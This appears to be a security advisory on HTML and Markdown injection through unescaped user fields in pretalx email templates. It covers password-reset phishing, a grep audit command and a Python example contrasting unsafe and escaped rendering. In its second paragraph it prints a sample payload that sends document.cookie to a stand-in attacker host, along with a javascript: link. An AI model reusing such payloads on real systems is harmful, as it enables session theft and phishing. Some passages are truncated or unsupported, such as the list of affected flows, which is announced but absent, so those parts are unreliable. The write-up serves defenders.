
[MEDIUM] Security Advisory: pretalx mail templates vulnerable to email injection via unescaped user-controlled placeholders (pretalx)

Pretalx, the open-source conference management platform powering thousands of events worldwide, ships with a vulnerability that lets unauthenticated attackers hijack its email sender address for phishing. Attackers inject malicious HTML or Markdown links into user-controlled fields like display names, tricking the system into rendering arbitrary content in emails sent from the event’s legitimate address. These emails pass SPF, DKIM, and DMARC checks, making them highly convincing for scams.

The core issue stems from unescaped placeholders in pretalx’s mail templates. Fields such as account display names, speaker names, proposal titles, biographies, and even question answers flow directly into HTML email bodies without sanitization. An attacker registers an account with a crafted name like <img src="x" onerror="fetch('https://attacker.com/steal?cookie='+document.cookie)"> or a Markdown link [Click here](javascript:alert('phish')). When pretalx interpolates this into an email, browsers render it as executable code or links.

Primary Exploitation: Password Reset Abuse

The simplest attack targets the password reset flow. An attacker creates a throwaway account using the victim’s email address and a malicious display name. They trigger the reset, and pretalx sends an email from its configured sender—say, no-reply@conference2024.org—with the injected payload. The victim receives what looks like a genuine reset link, but it carries phishing payloads like fake login forms or credential harvesters.

This works because pretalx versions up to the latest stable (as of this advisory, around 2024.3.x) lack output escaping in email rendering. The advisory rates it MEDIUM severity, but real-world impact skews higher: conferences handle sensitive data from thousands of speakers, organizers, and attendees. A single compromised event could phish hundreds.

Wider Attack Surface

No authentication required beyond basic registration, which many pretalx instances leave open during calls for papers. Beyond resets, the flaw hits:

Organizers trigger these unwittingly, amplifying reach. Pretalx powers events like FOSDEM, CCC, and countless smaller conferences—over 10,000 instances tracked on public directories. If even 1% run vulnerable versions, that’s 100+ potential phishing hubs.

Credits go to Mark Fijneman, who reported a related issue, exposing the pattern. The pretalx team acknowledged it, but as of now, patches lag in community deployments. Check your instance’s git log for commits around escaping in pretalx/mail/templates.

Why This Matters—and How to Fix It

Email phishing succeeds at scale when senders appear trusted. Mail from a legitimate domain with full authentication (SPF, DKIM, DMARC) bypasses the filters, such as Gmail's, that block spoofed mail. Attackers could chain this: phish organizer creds, then pivot to attendee lists or sponsor data. In crypto/finance events (common pretalx users), this risks wallet drains or insider leaks.

Operators, act now:

# Quick audit: list mail-template placeholders that interpolate user-controlled
# fields (names, titles, bios) so each can be checked for an escape filter
grep -rnE '\{\{[^}]*(name|title|bio)[^}]*\}\}' pretalx/mail/

# Patch: Upstream fix in dev branch uses bleach or similar sanitizers.
# Downgrade to text-only emails or enable HTML stripping.

Upgrade to patched versions when available—pretalx maintainers prioritize this post-report. Strip HTML from user fields server-side using libraries like bleach or markdown-it with safe link sanitization. Disable HTML emails if feasible; plaintext dodges rendering entirely.
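The two rendering paths described above (raw interpolation of user fields into an HTML body, versus escaping plus safe-link Markdown handling) side by side, as an added Python example. This is not pretalx's own code: the template, the `{name}`-style placeholder syntax, the field values and the helper names are all constructed here for illustration, and pretalx's real mail-template and escaping code differs.

```python
import html
import re
from urllib.parse import urlsplit

# Constructed stand-in for a password-reset mail template (assumption: placeholders
# are str.format-style; this is not pretalx's actual template syntax).
RESET_TEMPLATE = (
    "<p>Hello {name},</p>"
    '<p>Reset your password: <a href="{reset_url}">Reset</a></p>'
)

# Constructed sample display name carrying markup and a Markdown link with a
# non-http scheme, the two injection shapes the advisory describes.
SAMPLE_NAME = '<img src="x" onerror="alert(1)"> [Click here](javascript:alert(1))'

# Markdown inline link: [text](target). Target stops at the first ')' or whitespace.
MD_LINK = re.compile(r"\[([^\]]*)\]\(([^)\s]*)\)")
SAFE_SCHEMES = {"http", "https", "mailto"}


def render_unsafe(template, **fields):
    """The flawed pattern: user-controlled values dropped straight into HTML."""
    return template.format(**fields)


def sanitize_link_target(url):
    """Keep a link target only if its scheme is allow-listed; otherwise neuter it."""
    scheme = urlsplit(url.strip()).scheme.lower()
    return url if scheme in SAFE_SCHEMES else "#"


def render_user_field(value):
    """HTML-escape everything a user typed, re-creating only Markdown links
    whose targets pass the scheme allow-list as real <a> tags."""
    out, pos = [], 0
    for m in MD_LINK.finditer(value):
        out.append(html.escape(value[pos:m.start()], quote=True))
        text = html.escape(m.group(1), quote=True)
        href = html.escape(sanitize_link_target(m.group(2)), quote=True)
        out.append(f'<a href="{href}">{text}</a>')
        pos = m.end()
    out.append(html.escape(value[pos:], quote=True))
    return "".join(out)


def render_safe(template, user_fields, system_fields):
    """Hardened rendering: user fields go through render_user_field, system
    values (e.g. the reset URL the application itself generated) are
    attribute-escaped but not Markdown-processed."""
    safe = {k: render_user_field(v) for k, v in user_fields.items()}
    safe.update({k: html.escape(v, quote=True) for k, v in system_fields.items()})
    return template.format(**safe)


if __name__ == "__main__":
    url = "https://example.org/reset/abc"  # constructed value
    print("UNSAFE:", render_unsafe(RESET_TEMPLATE, name=SAMPLE_NAME, reset_url=url))
    print("SAFE:  ", render_safe(RESET_TEMPLATE, {"name": SAMPLE_NAME}, {"reset_url": url}))
```

The unsafe path leaves the `<img>` tag and the `javascript:` link intact, which is exactly what a mail client's HTML renderer would then act on. The hardened path turns the tag into inert text and rewrites the disallowed link target to `#`, while a plain `[Schedule](https://example.org/s)` link still becomes a working anchor. Plaintext-only mail, as the advisory suggests, sidesteps the problem entirely; this shows what output escaping has to do if HTML mail stays on.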

Skeptically, this isn’t novel—email XSS plagues apps from Discourse to Nextcloud. But pretalx’s event scale multiplies risk. Event organizers often skimp on security; this forces a reckoning. If you’re running pretalx, audit templates today. Attackers won’t wait for CVEs.

Bottom line: One bad name field means phishing at conference scale. Fix it, or your no-reply becomes their backdoor.

April 18, 2026 · 3 min · 13 views · Source: GitHub Security